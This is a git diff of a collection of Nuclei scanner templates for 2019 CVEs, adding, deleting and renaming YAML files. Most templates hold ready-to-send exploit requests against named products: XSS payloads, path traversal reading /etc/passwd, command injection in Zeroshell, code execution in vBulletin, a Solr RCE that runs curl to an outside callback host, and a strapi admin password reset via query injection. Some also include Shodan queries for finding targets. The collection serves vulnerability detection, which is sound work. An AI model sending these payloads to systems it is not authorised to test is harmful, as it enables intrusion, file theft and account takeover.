1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. + reference: + - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 + - http://mmcloughlin.com/posts/your-pprof-is-showing + - https://github.com/kubernetes/kubernetes/issues/81023 + - https://groups.google.com/d/msg/kubernetes-security-announce/pKELclHIov8/BEDtRELACQAJ + - https://nvd.nist.gov/vuln/detail/CVE-2019-11248 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.2 + cve-id: CVE-2019-11248 + cwe-id: CWE-862 + cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* + epss-score: 0.80033 + tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure + metadata: + max-request: 2 + +http: + - method: GET + path: + - "{{BaseURL}}/debug/pprof/" + - "{{BaseURL}}/debug/pprof/goroutine?debug=1" + + stop-at-first-match: true + matchers: + - type: word + words: + - "Types of profiles available:" + - "Profile Descriptions" + - "goroutine profile: total" + condition: or + +# Enhanced by mp on 2022/06/15 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml deleted file mode 100644 index 58ffa77862..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-11370 -info: - name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field. - reference: - - https://www.exploit-db.com/exploits/46897 - - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2019-11370 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"pCOWeb" - verified: "true" - tags: cve,cve2019,pcoweb,xss,carel -requests: - - raw: - - | - POST /config/pw_snmp_done.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - | - GET /config/pw_snmp.html HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "text/html")' - - status_code_2 == 200 - - contains(body_2, 'value=\"\">\">') - condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-12276.yaml b/nuclei-templates/CVE-2019/CVE-2019-12276.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12276.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12276.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12314.yaml b/nuclei-templates/CVE-2019/CVE-2019-12314.yaml deleted file mode 100644 index 4fc83720a1..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12314.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-12314 - -info: - name: Deltek Maconomy 2.2.5 Local File Inclusion - author: madrobot - severity: critical - description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. - reference: - - http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html - - https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm - - https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-12314 - cwe-id: CWE-22 - tags: cve,cve2019,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12583.yaml b/nuclei-templates/CVE-2019/CVE-2019-12583.yaml deleted file mode 100644 index c6b9138d4b..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12583.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-12583 -info: - name: Zyxel ZyWall UAG/USG - Account Creation Access - author: n-thumann,daffainfo - severity: critical - description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. - reference: - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-12583 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2019-12583 - cwe-id: CWE-425 - tags: cve,cve2019,zyxel,zywall -requests: - - method: GET - path: - - "{{BaseURL}}/free_time.cgi" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "free_time_redirect.cgi?u=" - - "&smsOnly=0" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12593.yaml b/nuclei-templates/CVE-2019/CVE-2019-12593.yaml deleted file mode 100644 index dcc7b9725c..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12593.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-12593 - -info: - name: IceWarp <=10.4.4 - Local File Inclusion - author: pikpikcu - severity: high - description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. - reference: - - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt - - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 - - http://www.icewarp.com - - https://www.icewarp.com/downloads/trial/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-12593 - cwe-id: CWE-22 - metadata: - google-dork: Powered By IceWarp 10.4.4 - tags: cve,cve2019,lfi,icewarp - -requests: - - method: GET - path: - - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini' - - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "[intl]" - - "root:x:0" diff --git a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml b/nuclei-templates/CVE-2019/CVE-2019-12616.yaml deleted file mode 100644 index 3cb739ae8e..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2019-12616 - -info: - name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery - author: Mohammedsaneem,philippedelteil,daffainfo - severity: medium - description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. - reference: - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-12616 - cwe-id: CWE-352 - tags: csrf,edb,cve,cve2019,phpmyadmin - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 401 # password protected - - - type: word - words: - - "phpmyadmin.net" - - "phpMyAdmin" - condition: or - - - type: dsl - dsl: - - compare_versions(version, '< 4.9.0') - - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '\?v=([0-9.]+)' - - - type: regex - group: 1 - regex: - - '\?v=([0-9.]+)' - -# Enhanced by md on 2023/01/11 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12725.yaml b/nuclei-templates/CVE-2019/CVE-2019-12725.yaml deleted file mode 100644 index 69712322c3..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12725.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-12725 - -info: - name: Zeroshell 3.9.0 Remote Command Execution - author: dwisiswant0,akincibor - severity: critical - description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. - reference: - - https://www.zeroshell.org/new-release-and-critical-vulnerability/ - - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py - - https://zeroshell.org/blog/ - remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-12725 - cwe-id: CWE-78 - tags: cve,cve2019,rce,zeroshell - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml deleted file mode 100644 index d1cafa9db7..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: CVE-2019-13396 - -info: - name: FlightPath - Local File Inclusion - author: 0x_Akoko,daffainfo - severity: medium - description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. - impact: | - This vulnerability can lead to unauthorized access, data leakage, and remote code execution. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://www.exploit-db.com/exploits/47121 - - http://getflightpath.com/node/2650 - - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/d4n-sec/d4n-sec.github.io - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-13396 - cwe-id: CWE-22 - epss-score: 0.02602 - epss-percentile: 0.90051 - cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: getflightpath - product: flightpath - tags: cve,cve2019,flightpath,lfi,edb,getflightpath - -http: - - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - group: 1 - regex: - - "idden' name='form_token' value='([a-z0-9]+)'>" - internal: true - part: body -# digest: 4a0a00473045022100f914e78ac71588395cde4bdd71fd9b68becbacd99efa10a46cd8fb336167e4990220063fa341232cdda62f8cf22c6e18aa7a5abd50cc86691eb6dec1c43bedf7749a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-14223.yaml b/nuclei-templates/CVE-2019/CVE-2019-14223.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14223.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14223.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14251.yaml b/nuclei-templates/CVE-2019/CVE-2019-14251.yaml deleted file mode 100644 index 9b1fec3938..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-14251.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-14251 -info: - name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal - author: 0x_Akoko - severity: high - description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. - reference: - - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - - https://www.cvedetails.com/cve/CVE-2019-14251 - - https://vuldb.com/?id.146815 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-14251 - cwe-id: CWE-22 - tags: cve,cve2019,temenos,lfi,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15043.yaml b/nuclei-templates/CVE-2019/CVE-2019-15043.yaml new file mode 100644 index 0000000000..5c6553f16d --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-15043.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-15043 + +info: + name: Grafana - Improper Access Control + author: Joshua Rogers + severity: high + description: | + Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. + reference: + - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 + - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ + - https://bugzilla.redhat.com/show_bug.cgi?id=1746945 + - https://aaron-hoffmann.com/posts/cve-2019-15043/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 + remediation: Upgrade to 6.3.4 or higher. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2019-15043 + cwe-id: CWE-284 + metadata: + max-request: 1 + shodan-query: title:"Grafana" + verified: "true" + tags: cve,cve2019,grafana,dos,intrusive + +variables: + payload: '{{repeat("A", 4000)}}' + +http: + - method: POST + path: + - "{{BaseURL}}/api/snapshots" + headers: + Content-Type: application/json + body: '{"dashboard": {"name":"{{payload}}"}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"deleteUrl":' + - '"deleteKey":' + - '"key":' + - '"url":' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + +# Enhanced by md on 2023/04/12 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15713.yaml b/nuclei-templates/CVE-2019/CVE-2019-15713.yaml new file mode 100644 index 0000000000..72094546ac --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-15713.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-15713 +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo,dhiyaneshDk + severity: medium + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml b/nuclei-templates/CVE-2019/CVE-2019-15811.yaml deleted file mode 100644 index a8adc52d15..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2019-15811 -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters. - reference: - - https://www.exploit-db.com/exploits/47325 - - https://github.com/domainmod/domainmod/issues/108 - - https://zerodays.lol/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-15811 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - - 'contains(body_2, "DomainMOD")' - condition: and diff --git a/nuclei-templates/CVE-2019/CVE-2019-1653.yaml b/nuclei-templates/CVE-2019/CVE-2019-1653.yaml new file mode 100644 index 0000000000..ea10847722 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-1653.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-1653 + +info: + name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure + author: dwisiswant0 + severity: high + description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info + - https://www.exploit-db.com/exploits/46262/ + - https://www.exploit-db.com/exploits/46655/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-1653 + cwe-id: CWE-200 + tags: cve,cve2019,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/config.exp" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "sysconfig" + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-16759.yaml b/nuclei-templates/CVE-2019/CVE-2019-16759.yaml new file mode 100644 index 0000000000..329277e986 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-16759.yaml @@ -0,0 +1,46 @@ +id: CVE-2019-16759 + +info: + name: vBulletin 5.0.0-5.5.4 - Remote Command Execution + author: madrobot + severity: critical + description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ + - https://seclists.org/fulldisclosure/2019/Sep/31 + - https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-16759 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-score: 0.97528 + metadata: + max-request: 1 + shodan-query: http.component:"vBulletin" + verified: "true" + tags: cve,cve2019,rce,kev,seclists,vbulletin + +http: + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B + + matchers-condition: and + matchers: + + - type: word + words: + - "addcc9f9f2f40e2e6aca3079b73d9d17" + + - type: status + status: + - 200 + +# Enhanced by md on 2023/03/20 diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17558.yaml b/nuclei-templates/CVE-2019/CVE-2019-17558.yaml deleted file mode 100644 index 6009bff30d..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17558.yaml +++ /dev/null @@ -1,74 +0,0 @@ -id: CVE-2019-17558 - -info: - name: Apache Solr <=8.3.1 - Remote Code Execution - author: pikpikcu,madrobot - severity: high - description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). - remediation: | - Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. - reference: - - https://issues.apache.org/jira/browse/SOLR-13971 - - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - - https://lists.apache.org/thread.html/rb964fe5c4e3fc05f75e8f74bf6b885f456b7a7750c36e9a8045c627a@%3Cissues.lucene.apache.org%3E - - http://packetstormsecurity.com/files/157078/Apache-Solr-8.3.0-Velocity-Template-Remote-Code-Execution.html - - https://lists.apache.org/thread.html/r0b7b9d4113e6ec1ae1d3d0898c645f758511107ea44f0f3a1210c5d5@%3Cissues.lucene.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.5 - cve-id: CVE-2019-17558 - cwe-id: CWE-74 - epss-score: 0.97507 - epss-percentile: 0.9998 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: apache - product: solr - tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast - -http: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - - | - POST /solr/{{core}}/config HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "update-queryresponsewriter": { - "startup": "lazy", - "name": "velocity", - "class": "solr.VelocityResponseWriter", - "template.base.dir": "", - "solr.resource.loader.enabled": "true", - "params.resource.loader.enabled": "true" - } - } - - | - GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 - Host: {{Hostname}} - Connection: close - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - internal: true - -# digest: 4b0a00483046022100d95ae2fde11c073cfb8300dbe88398c8516603bb4a679c01eadd13c285c3934c02210095bb54e1c435ffb3f579c033627a1769da0f8a3db882b32e06bbf44deea77ba3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18371.yaml b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml deleted file mode 100644 index 56853b7955..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-18371.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-18371 -info: - name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion - author: ritikchaddha - severity: high - description: | - Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. - reference: - - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18371 - cwe-id: CWE-22 - tags: xiaomi,cve2019,cve,lfi,router,mi,router -requests: - - method: GET - path: - - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18665.yaml b/nuclei-templates/CVE-2019/CVE-2019-18665.yaml deleted file mode 100644 index 36b4018e5a..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-18665.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2019-18665 -info: - name: DOMOS 5.5 - Directory Traversal - author: 0x_Akoko - severity: high - description: | - The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. - reference: - - https://atomic111.github.io/article/secudos-domos-directory_traversal - - https://vuldb.com/?id.144804 - - https://www.cvedetails.com/cve/CVE-2019-18665 - - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18665 - cwe-id: CWE-22 - tags: cve,cve2019,domos,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml b/nuclei-templates/CVE-2019/CVE-2019-18818.yaml deleted file mode 100644 index 3e560d9c4b..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2019-18818 - -info: - name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset - author: idealphase - severity: critical - description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. - reference: - - https://github.com/advisories/GHSA-6xc2-mj39-q599 - - https://www.exploit-db.com/exploits/50239 - - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 - - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-18818 - cwe-id: CWE-640 - tags: cve,cve2019,strapi,auth-bypass,intrusive - -requests: - - raw: - - | - POST /admin/auth/reset-password HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/json - - {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - condition: and - words: - - '"username":' - - '"email":' - - '"jwt":' - part: body - - extractors: - - type: json - json: - - .user.username - - .user.email - - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18922.yaml b/nuclei-templates/CVE-2019/CVE-2019-18922.yaml deleted file mode 100644 index 2584b6f51b..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-18922.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2019-18922 - -info: - name: Allied Telesis AT-GS950/8 Directory Traversal - author: 0x_Akoko - severity: high - description: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 - reference: - - 